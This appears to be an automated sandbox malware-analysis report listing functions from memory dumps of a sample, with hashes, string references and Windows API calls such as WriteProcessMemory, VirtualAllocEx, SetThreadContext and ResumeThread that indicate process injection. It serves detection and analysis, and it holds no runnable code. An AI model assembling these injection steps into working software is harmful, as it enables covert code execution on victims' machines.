Instruction Fuzzy Hash: 2641BE7160425A9FDB228F68C844BAE7BF2FFC9300F05899AE8068F395DB34C851C791

Function 0153CD52 Relevance: 2.5, Strings: 2, Instructions: 47COMMON

Download Yara Rule

Strings

4']q, xrefs: 0153CD6D
4']q, xrefs: 0153CD84

Memory Dump Source

Source File: 00000000.00000002.2712322697.0000000001530000.00000040.00000800.00020000.00000000.sdmp, Offset: 01530000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1530000_umVoLahqZn.jbxd

Similarity

API ID:
String ID: 4']q$4']q
API String ID: 0-3120983240
Opcode ID: d92e7a4e2a98afb001cf86c1b9dd0ba9689a3d9a4e18e18f71b8f5f414f06642
Instruction ID: a4ec2805d25cdcecb3bf5cfcf729828fa58700c571aaa0ac6f3e59695b348f87
Opcode Fuzzy Hash: d92e7a4e2a98afb001cf86c1b9dd0ba9689a3d9a4e18e18f71b8f5f414f06642
Instruction Fuzzy Hash: 210186363000056FDB285A6D9C9497E6FDBAFCC361B144529B90AC7350DE758C0197A0

Function 07C53350 Relevance: 2.5, Strings: 2, Instructions: 43COMMON

Download Yara Rule

Strings

Te]q, xrefs: 07C53357
TJbq, xrefs: 07C5336C

Memory Dump Source

Source File: 00000000.00000002.2727988329.0000000007C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7c50000_umVoLahqZn.jbxd

Similarity

API ID:
String ID: TJbq$Te]q
API String ID: 0-3147309840
Opcode ID: c652c98f560af88cd98e79f434cbf125dfd575b388a18cc7ce7b808f30f3a6bc
Instruction ID: d2896ca39f62ca64b3fa9504236478e6d97ea0b2ded9f42fa7470a5ed2227244
Opcode Fuzzy Hash: c652c98f560af88cd98e79f434cbf125dfd575b388a18cc7ce7b808f30f3a6bc
Instruction Fuzzy Hash: 93F0F6753000164FCA08AB7DA45493E77DBAFC9A20315005DE50ACB3A4CD61DC034396

Function 07C50746 Relevance: 2.0, Strings: 1, Instructions: 762COMMON

Download Yara Rule

Strings

Te]q, xrefs: 07C5079A

Memory Dump Source

Source File: 00000000.00000002.2727988329.0000000007C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7c50000_umVoLahqZn.jbxd

Similarity

API ID:
String ID: Te]q
API String ID: 0-52440209
Opcode ID: 955f21eb8c537449625b958df6cbdd9425b7826c2445cab6763e26328fbd1006
Instruction ID: d5e9499cce2c877b219d3758023488e1c0a3ecd360fd1e70ce92ae1fcfe2bee3
Opcode Fuzzy Hash: 955f21eb8c537449625b958df6cbdd9425b7826c2445cab6763e26328fbd1006
Instruction Fuzzy Hash: 7A52AE70E143198BC754FB78E89976DBBB6AB88304F8485A9D44CF7350DE385C89CB92

Function 01539030 Relevance: 1.7, Strings: 1, Instructions: 462COMMON

Download Yara Rule

Strings

(o]q, xrefs: 01539069

Memory Dump Source

Source File: 00000000.00000002.2712322697.0000000001530000.00000040.00000800.00020000.00000000.sdmp, Offset: 01530000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1530000_umVoLahqZn.jbxd

Similarity

API ID:
String ID: (o]q
API String ID: 0-794736227
Opcode ID: 2cb36daddba9a35b6eca8a9661b0ccf1fa77049b377f77844198c028859f3d01
Instruction ID: c387a41c6a52a17a095f182a914b7ab9fce8d3d5fbbdc31c4b8a7389661baddd
Opcode Fuzzy Hash: 2cb36daddba9a35b6eca8a9661b0ccf1fa77049b377f77844198c028859f3d01
Instruction Fuzzy Hash: 061229B1601506DFCB15CF68C584AAEBBF6BF88308F158954E405DB3A5D7B0E981CFA1

Function 07E2E640 Relevance: 1.6, APIs: 1, Instructions: 69injectionCOMMON

Download Yara Rule

APIs

WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 07E2E6D0

Memory Dump Source

Source File: 00000000.00000002.2728172164.0000000007E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 07E20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7e20000_umVoLahqZn.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: 840925d9b176c0402422c4603aa607c68b315be0ed82a4cbd3622f1471c7be54
Instruction ID: b9126616c95c583e836d3a61d0137efdd8b9f635ae198c8f69924a812d5a9ba9
Opcode Fuzzy Hash: 840925d9b176c0402422c4603aa607c68b315be0ed82a4cbd3622f1471c7be54
Instruction Fuzzy Hash: A7214AB5D003199FCB10DFA9C885BEEBBF5FF48314F108429E919A7240C7789955DBA4

Function 07CBBE27 Relevance: 1.6, APIs: 1, Instructions: 67memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNELBASE(?,?,?,?), ref: 07CBBEAB

Memory Dump Source

Source File: 00000000.00000002.2728075415.0000000007CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7cb0000_umVoLahqZn.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 699916dad11f29b2e45e116a0e056ee859b79ae5719cac0f217926b16237905d
Instruction ID: c69a7a209985011f8eb2eb46d9ff94e2eb45af2a39581a62f12740f9e7f76ee3
Opcode Fuzzy Hash: 699916dad11f29b2e45e116a0e056ee859b79ae5719cac0f217926b16237905d
Instruction Fuzzy Hash: 58213AB58043499FCB11CF9AC884ADEFFF4EF49310F10845AE558A7251C378A944CFA1

Function 07E2F030 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON

Download Yara Rule

APIs

Wow64SetThreadContext.KERNEL32(?,00000000), ref: 07E2F0AE

Memory Dump Source

Source File: 00000000.00000002.2728172164.0000000007E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 07E20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7e20000_umVoLahqZn.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: 9596519061c19f8962ff0504cc39d7409c87bdc6e8f35004ec3f8f0eeed79133
Instruction ID: 8e2f6bf7518792a8686647cc55c6c8860d3ae8ec8640e97f51f1482830be00fb
Opcode Fuzzy Hash: 9596519061c19f8962ff0504cc39d7409c87bdc6e8f35004ec3f8f0eeed79133
Instruction Fuzzy Hash: E32138B1D002098FDB10DFAAC485BEEBBF4FF48314F10842AD559A7240CB78A985CFA1

Function 07E2D818 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON

Download Yara Rule

APIs

Wow64GetThreadContext.KERNEL32(?,00000000), ref: 07E2D896

Memory Dump Source

Source File: 00000000.00000002.2728172164.0000000007E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 07E20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7e20000_umVoLahqZn.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: 393292d7e49df06b062855d9b847971227c67d4c21520808d99a52705f461202
Instruction ID: 5facfcc03c6884a125fd8d3878817d77d76537f149d64f8d52bc7986383701d7
Opcode Fuzzy Hash: 393292d7e49df06b062855d9b847971227c67d4c21520808d99a52705f461202
Instruction Fuzzy Hash: F52138B5D002098FDB14DFAAC4857EEBBF4EF48314F108429D559A7240CB78A985CFA1

Function 07E24A40 Relevance: 1.6, APIs: 1, Instructions: 62memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNELBASE(?,?,?,?), ref: 07E24ABB

Memory Dump Source

Source File: 00000000.00000002.2728172164.0000000007E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 07E20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7e20000_umVoLahqZn.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: cd5cf903c5d5ba5cf45c5fa12c181f0f27f914f435f894cbede0f44b5de01d59
Instruction ID: 6f0a9b08e2b1adffa20763dc8108a95771d8c6eacd71eb7c6e191a10b1b5e6b1
Opcode Fuzzy Hash: cd5cf903c5d5ba5cf45c5fa12c181f0f27f914f435f894cbede0f44b5de01d59
Instruction Fuzzy Hash: 04214AB59002499FCB10DF9AC885BDEFBF9FF49324F108429E458A3240D378A944CFA1

Function 07E2ED90 Relevance: 1.6, APIs: 1, Instructions: 60COMMON

Download Yara Rule

APIs

VirtualProtectEx.KERNELBASE(?,?,?,?,?), ref: 07E2EE07

Memory Dump Source

Source File: 00000000.00000002.2728172164.0000000007E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 07E20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7e20000_umVoLahqZn.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 90deac7ba48644396fab22deaf83bf4afd848b538eadbf7b172f384b3108ce2d
Instruction ID: 191e63c8aa2057addaf57f10c00e8a2c80dc5652dca78d25cb74f7af3a8631eb
Opcode Fuzzy Hash: 90deac7ba48644396fab22deaf83bf4afd848b538eadbf7b172f384b3108ce2d
Instruction Fuzzy Hash: 722135B1C002099FDB10DFAAC444AEEBBF5FF88320F10842AD519A7240CB79A941DFA1

Function 07C3C5F8 Relevance: 1.6, APIs: 1, Instructions: 56fileCOMMON

Download Yara Rule

APIs

DeleteFileW.KERNELBASE(00000000), ref: 07C3C668

Memory Dump Source

Source File: 00000000.00000002.2727896490.0000000007C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7c30000_umVoLahqZn.jbxd

Similarity

API ID: DeleteFile
String ID:
API String ID: 4033686569-0
Opcode ID: 2ad81ddaf247f918e2480afef6027ed9aee2cfda60a0298edbc4f1454cd19846
Instruction ID: 4bb8f1611caa912d7f0d8006068c14a8ff5ef3dc57080ebe63db5e8659becc8c
Opcode Fuzzy Hash: 2ad81ddaf247f918e2480afef6027ed9aee2cfda60a0298edbc4f1454cd19846
Instruction Fuzzy Hash: 671124B1C0061A9BCB10CF9AC544A9EFBB4EF48720F10812AD818B7240D778A944CFA5

Function 07E24A48 Relevance: 1.6, APIs: 1, Instructions: 55memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNELBASE(?,?,?,?), ref: 07E24ABB

Memory Dump Source

Source File: 00000000.00000002.2728172164.0000000007E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 07E20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7e20000_umVoLahqZn.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: c8db7fd807dd3cb3e634247b7b8b867e3e3098903765aff31f593c2ac366b154
Instruction ID: 6ffc979e8d1211a7cf7c4164dbfdb3bdd1bdbccc9aa22c2ded4afffacc5b7060
Opcode Fuzzy Hash: c8db7fd807dd3cb3e634247b7b8b867e3e3098903765aff31f593c2ac366b154
Instruction Fuzzy Hash: EF21E4B59002599FCB10DF9AC884BDEFBF4FF49320F108429E958A7650D378A944CFA5

Function 07CBBE38 Relevance: 1.6, APIs: 1, Instructions: 55memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNELBASE(?,?,?,?), ref: 07CBBEAB

Memory Dump Source

Source File: 00000000.00000002.2728075415.0000000007CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7cb0000_umVoLahqZn.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 59773ec872d37740fa72237038d01770823ec3c3689d8d6426c5ef5333b094a7
Instruction ID: dfa695a88d707cdf232d4c93a1c94fa65941f57472ccc07763c09ffaddab4497
Opcode Fuzzy Hash: 59773ec872d37740fa72237038d01770823ec3c3689d8d6426c5ef5333b094a7
Instruction Fuzzy Hash: 7421E4B59002499FCB10DF9AC484BDEFBF8FF49320F108429E958A7250D378AA44CFA1

Function 07E2DF00 Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 07E2DF6E

Memory Dump Source

Source File: 00000000.00000002.2728172164.0000000007E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 07E20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7e20000_umVoLahqZn.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: a3ae252fecd044e0f5cddbe74169f537137b18ea2d291d47b3c200c9fa180166
Instruction ID: 875eb47a549b3540562c6648c5ec36a78f09e68c3acec56f1a1e4230088e6cae
Opcode Fuzzy Hash: a3ae252fecd044e0f5cddbe74169f537137b18ea2d291d47b3c200c9fa180166
Instruction Fuzzy Hash: FB113AB59002499FDB10DFAAC845ADEBFF5EF48314F108419E519A7250C779A550CFA1

Function 07E2F298 Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNELBASE ref: 07E2F2FA

Memory Dump Source

Source File: 00000000.00000002.2728172164.0000000007E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 07E20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7e20000_umVoLahqZn.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: ff18bae8b73ec6dc77f713f1ef501daba42172914cde05a94c8ee291926c50a8
Instruction ID: 9975dfecdaaf81f23e975c798e5f6ece2ce06d0590876bfe03f0cb4653e6e40c
Opcode Fuzzy Hash: ff18bae8b73ec6dc77f713f1ef501daba42172914cde05a94c8ee291926c50a8
Instruction Fuzzy Hash: CA1166B1C002498FCB20DFAAC4457EEFBF5EF89324F208819C419A7240CB79A940CBA4

Function 07E2E138 Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,00000010,00000000,?), ref: 07E2F795

Memory Dump Source

Source File: 00000000.00000002.2728172164.0000000007E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 07E20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7e20000_umVoLahqZn.jbxd

Similarity

API ID: MessagePost
String ID:
API String ID: 410705778-0
Opcode ID: afa1f6eb444c0a221e438f9015257032d8973241bfeb4ee6dbba65f1cf6a04b2
Instruction ID: 8ea3d0d5bde289faaefb2ac59b0ed6222b15b7f56f04360d53bf1d5069b3e615
Opcode Fuzzy Hash: afa1f6eb444c0a221e438f9015257032d8973241bfeb4ee6dbba65f1cf6a04b2
Instruction Fuzzy Hash: B31106B58003599FDB10DF99C485BDEBBF8FB49310F108459E558A7200C379A944CFA1

Function 01539830 Relevance: 1.5, Strings: 1, Instructions: 212COMMON

Download Yara Rule

Strings

4']q, xrefs: 015399E2

Memory Dump Source

Source File: 00000000.00000002.2712322697.0000000001530000.00000040.00000800.00020000.00000000.sdmp, Offset: 01530000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1530000_umVoLahqZn.jbxd

Similarity

API ID:
String ID: 4']q
API String ID: 0-1259897404
Opcode ID: 1bcf6617fdedb4ee45b1f993c811ec36a9a19a0a4182234cbac8c26fe07d0a2c
Instruction ID: 008bdb11a407b1198933c4edf432ad1d9b5a81dd89fbdc094b919f2f2354adbf
Opcode Fuzzy Hash: 1bcf6617fdedb4ee45b1f993c811ec36a9a19a0a4182234cbac8c26fe07d0a2c
Instruction Fuzzy Hash: 1C617FB23101068FDB14DE3EC884A6A7BE9BFC9718B1545A9E956CF361DBB0DC018B50

Function 0153B5C0 Relevance: 1.4, Strings: 1, Instructions: 126COMMON

Download Yara Rule

Strings

Te]q, xrefs: 0153B6A4

Memory Dump Source

Source File: 00000000.00000002.2712322697.0000000001530000.00000040.00000800.00020000.00000000.sdmp, Offset: 01530000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1530000_umVoLahqZn.jbxd

Similarity

API ID:
String ID: Te]q
API String ID: 0-52440209
Opcode ID: f44447f9a619afc88b2f74e1a641276e340e1c0ddd0ce7b3dd81dddbd664859e
Instruction ID: d0ff18741e1fc43e4af5bbb5cf8f92f0956e277309a55509448cbf26bac43c9b
Opcode Fuzzy Hash: f44447f9a619afc88b2f74e1a641276e340e1c0ddd0ce7b3dd81dddbd664859e
Instruction Fuzzy Hash: 82511674A10215DFDB04DF69D498EAEBBF2FF88700F2584A9E506AB361CB71AC01CB40

Function 01539620 Relevance: 1.4, Strings: 1, Instructions: 119COMMON

Download Yara Rule

Strings

4']q, xrefs: 015396AB

Memory Dump Source

Source File: 00000000.00000002.2712322697.0000000001530000.00000040.00000800.00020000.00000000.sdmp, Offset: 01530000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1530000_umVoLahqZn.jbxd

Similarity

API ID:
String ID: 4']q
API String ID: 0-1259897404
Opcode ID: f0ef8757e97cc08a9fceb7717af5276c6dd4c5d03127a9af607cc9f0fa11e537
Instruction ID: 2f208e9a4d47b075b1e66fc324e3132a692fec12f55cef0165f73cb81757f421
Opcode Fuzzy Hash: f0ef8757e97cc08a9fceb7717af5276c6dd4c5d03127a9af607cc9f0fa11e537
Instruction Fuzzy Hash: 234136B56002059FCB16DF69C888AAE7BB5FF89315F1000A9E916DB3B1C7B1DC41CBA1

Function 0153E1B0 Relevance: 1.4, Strings: 1, Instructions: 117COMMON

Download Yara Rule

Strings

Haq, xrefs: 0153E297

Memory Dump Source

Source File: 00000000.00000002.2712322697.0000000001530000.00000040.00000800.00020000.00000000.sdmp, Offset: 01530000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1530000_umVoLahqZn.jbxd

Similarity

API ID:
String ID: Haq
API String ID: 0-725504367
Opcode ID: b20309b2f21cfa5df308f938e2652d503f03a63f5196c2c2e9a36c9abd7b1a48
Instruction ID: 812888807a8fcba8e28235c289af0243655e710c856f666dab5dc0cecd8005fd
Opcode Fuzzy Hash: b20309b2f21cfa5df308f938e2652d503f03a63f5196c2c2e9a36c9abd7b1a48
Instruction Fuzzy Hash: DD418E312042559FCB269F29E855AAE7BE6FFC9311B09446AF846CF2A1CB34DC12CB51

Function 07C54234 Relevance: 1.3, Strings: 1, Instructions: 65COMMON

Download Yara Rule

Strings

43^q, xrefs: 07C54333

Memory Dump Source

Source File: 00000000.00000002.2727988329.0000000007C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7c50000_umVoLahqZn.jbxd

Similarity

API ID:
String ID: 43^q
API String ID: 0-2065357395
Opcode ID: 57ef326db368b6887e4599c887792167caf761875fde6ec7ae30e00d2b798545
Instruction ID: 1e98575b46db45856e1e323c2905005077e81e829cf4901812a7dbe009cf0110
Opcode Fuzzy Hash: 57ef326db368b6887e4599c887792167caf761875fde6ec7ae30e00d2b798545
Instruction Fuzzy Hash: 6411675690E3C10FD3079732AC646A93F76AF83264F0E45EBC8C2CB2A7C558494AC762

Function 01535F68 Relevance: 1.3, Strings: 1, Instructions: 62COMMON

Download Yara Rule

Strings

8aq, xrefs: 01535F31

Memory Dump Source

Source File: 00000000.00000002.2712322697.0000000001530000.00000040.00000800.00020000.00000000.sdmp, Offset: 01530000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1530000_umVoLahqZn.jbxd

Similarity

API ID:
String ID: 8aq
API String ID: 0-538729646
Opcode ID: b42c52ba2c230e908d92833a373d6490285f18fb26120810f4ee54bb52bea6b5
Instruction ID: 54ec53d352d96e27015d4739678eb6a2938c0c1760623507f771608fd83128b4
Opcode Fuzzy Hash: b42c52ba2c230e908d92833a373d6490285f18fb26120810f4ee54bb52bea6b5
Instruction Fuzzy Hash: F5119D75A102018FC745DB78C89896EBBE6FF9E200356D699E20ACF271EB34DC42DB51

Function 013F1AD1 Relevance: 1.3, APIs: 1, Instructions: 50COMMON

Download Yara Rule

APIs

CloseHandle.KERNELBASE(?), ref: 013F1B30

Memory Dump Source

Source File: 00000000.00000002.2711823731.00000000013F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_13f0000_umVoLahqZn.jbxd

Similarity

API ID: CloseHandle
String ID:
API String ID: 2962429428-0
Opcode ID: b18da5bce72d7ba7f28408389ef66150d49576cea2c26b03657af237fea9fa14
Instruction ID: 9f227d36ca0861d3ab216c539e65fb83244153ff26ff0511b5ecd839e1ebe42e
Opcode Fuzzy Hash: b18da5bce72d7ba7f28408389ef66150d49576cea2c26b03657af237fea9fa14
Instruction Fuzzy Hash: A01136B5800249DFDB20DF9AD445BDEBFF8EF48320F108459D958A7240D778A944CFA5

Function 013F1AD8 Relevance: 1.3, APIs: 1, Instructions: 47COMMON

Download Yara Rule

APIs

CloseHandle.KERNELBASE(?), ref: 013F1B30

Memory Dump Source

Source File: 00000000.00000002.2711823731.00000000013F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_13f0000_umVoLahqZn.jbxd

Similarity

API ID: CloseHandle
String ID:
API String ID: 2962429428-0
Opcode ID: a9213e2af1ece5e0df51c7d3bb619da06d37fd81aceb04ed1b5f79640665d5dc
Instruction ID: 08774e7ab29fe0bd08830124f3f6c3f53e8e19a1d4a0854e88acc4b312b62c13
Opcode Fuzzy Hash: a9213e2af1ece5e0df51c7d3bb619da06d37fd81aceb04ed1b5f79640665d5dc
Instruction Fuzzy Hash: 921103B6800249CFDB20DF9AD545BDEBBF4EB48320F10845AD958A7240D779A944CFA5

Function 07C514E8 Relevance: 1.3, Strings: 1, Instructions: 41COMMON

Download Yara Rule

Strings

(aq, xrefs: 07C51510

Memory Dump Source

Source File: 00000000.00000002.2727988329.0000000007C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7c50000_umVoLahqZn.jbxd

Similarity

API ID:
String ID: (aq
API String ID: 0-600464949
Opcode ID: eca7ade4140fe9af706207d5f32364681edc0d18173bdcfc0d18afa9669f7cb9
Instruction ID: 3d7cae94c9c31536d23a9e4afcbc92d5e1f68d0061ccf597b3eccd7eac744633
Opcode Fuzzy Hash: eca7ade4140fe9af706207d5f32364681edc0d18173bdcfc0d18afa9669f7cb9
Instruction Fuzzy Hash: 00F08B213092905FCB0B57795824A6F3F6A9FD3210B0980EFE801CB282CD208C02C3B1

Function 07C5E634 Relevance: .5, Instructions: 472COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2727988329.0000000007C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7c50000_umVoLahqZn.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fe3110513f20b7d368162a8fe948a4692081ddd1e77fa0b72a4f2e9c1874b887
Instruction ID: 3c3b13521ed66759f365ffdb6dae388800078263bdb66af22fabfda727b70a71
Opcode Fuzzy Hash: fe3110513f20b7d368162a8fe948a4692081ddd1e77fa0b72a4f2e9c1874b887
Instruction Fuzzy Hash: 9A026A70A192048FCB18BB78E99826D7BF6FF88304F5045AAE44AE7340EA385D85CF55

Function 07C5D789 Relevance: .4, Instructions: 436COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2727988329.0000000007C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7c50000_umVoLahqZn.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9b0dc8b8f537ab3213202d47a6dcdef9e73ea4974879faa73b9bb69ac3ada810
Instruction ID: d3dabb88dcc8e8b426f3375f62208fbc4cd4bd346e0d94723304fba749b725b3
Opcode Fuzzy Hash: 9b0dc8b8f537ab3213202d47a6dcdef9e73ea4974879faa73b9bb69ac3ada810
Instruction Fuzzy Hash: F8E10370B193118FC315BB79D8996297BE6EFC5314F4088A9D48AE7390DA3C9C46CB93

Function 07C5CAD0 Relevance: .4, Instructions: 413COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2727988329.0000000007C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7c50000_umVoLahqZn.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7e6fb7838eb906c640050f2c1bbd2677638c0bc3073c6ed92995743b5b7a2124
Instruction ID: ea310936fd07858956a7c63141b25da9a3d1d081f51c0670a48c1d2b60c67e85
Opcode Fuzzy Hash: 7e6fb7838eb906c640050f2c1bbd2677638c0bc3073c6ed92995743b5b7a2124
Instruction Fuzzy Hash: 66E1A371B10315CBC714BBB9E88962E7BB6EBC8304F814569D449E7380DE3D9C86CB92

Function 07C5E94B Relevance: .3, Instructions: 334COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2727988329.0000000007C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7c50000_umVoLahqZn.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a46ae7060ce206e896967c844f4dcde3684ecf9f73630b103cf4658a02da9d22
Instruction ID: 67fdc9ab24eb247e5134007a57c80f9071aa36c44fff849d357a17148b194c14
Opcode Fuzzy Hash: a46ae7060ce206e896967c844f4dcde3684ecf9f73630b103cf4658a02da9d22
Instruction Fuzzy Hash: 3AD11670E152088FCB58EBB8E99825DBBF6FB88304F104569E84AE3744EA385C85CF55

Function 0153F920 Relevance: .3, Instructions: 330COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2712322697.0000000001530000.00000040.00000800.00020000.00000000.sdmp, Offset: 01530000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1530000_umVoLahqZn.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c59eae4380342bfddb884f732fc9b6651cfc96f4b8fd5e901fb9fc5cdb8a4c75
Instruction ID: b14e677d371b5c1c0bb3ec5658d0bbab1f2ba518e4892742cd71f86f24fe842a
Opcode Fuzzy Hash: c59eae4380342bfddb884f732fc9b6651cfc96f4b8fd5e901fb9fc5cdb8a4c75
Instruction Fuzzy Hash: 77B1B470A2411A8BD724FBB9D98866E77BAEBC8304F514465D40DF7384EE3C5C4687A3

Function 07C5CAC0 Relevance: .3, Instructions: 323COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2727988329.0000000007C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7c50000_umVoLahqZn.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 34680c815d0e06196717d475160bddb604eee27780f3caec6a687bed073468fa
Instruction ID: c2c0fe4776b95715762b08c404638abbed6f6c3001efcafbe69dc95591071285
Opcode Fuzzy Hash: 34680c815d0e06196717d475160bddb604eee27780f3caec6a687bed073468fa
Instruction Fuzzy Hash: A6B1A370A11312CBC714FB79E89963E7BB6EB89304F814569D449E7380DE3D9C86CB92

Function 0153A9C0 Relevance: .3, Instructions: 317COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2712322697.0000000001530000.00000040.00000800.00020000.00000000.sdmp, Offset: 01530000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1530000_umVoLahqZn.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c3f53b8d550f40a9c600a1ac43357a60c92173fbfb7bfe51d59ef1a013545261
Instruction ID: 037dacbed715b3a4b229dc0d9f8358af6d63e3b93d1ae68d2a94028899ec424f
Opcode Fuzzy Hash: c3f53b8d550f40a9c600a1ac43357a60c92173fbfb7bfe51d59ef1a013545261
Instruction Fuzzy Hash: EED1E975A002188FCB15DF6CC5889ADBBF6BF88310B1A8469E945EB372D735EC41CB54

Function 0153A8A0 Relevance: .3, Instructions: 305COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2712322697.0000000001530000.00000040.00000800.00020000.00000000.sdmp, Offset: 01530000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1530000_umVoLahqZn.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f3acf01f9990ddac0e9913c5e0eb23d6aef94770bd6a95b8de4df4e004b50770
Instruction ID: f51a1b572d104619e53c385695df55e6a25f634ccc70465c7f1115dca82701d4
Opcode Fuzzy Hash: f3acf01f9990ddac0e9913c5e0eb23d6aef94770bd6a95b8de4df4e004b50770
Instruction Fuzzy Hash: 11D1F875E002198FCB15CF68C98899DBBF6BF88310B1A8459E595EB3A2D734EC41CB54

Function 0153C388 Relevance: .2, Instructions: 201COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2712322697.0000000001530000.00000040.00000800.00020000.00000000.sdmp, Offset: 01530000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1530000_umVoLahqZn.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3f01720a76d6f8f01b6532c3af0fe7a2dfc59f85db4ec5d850fafe75635ec284
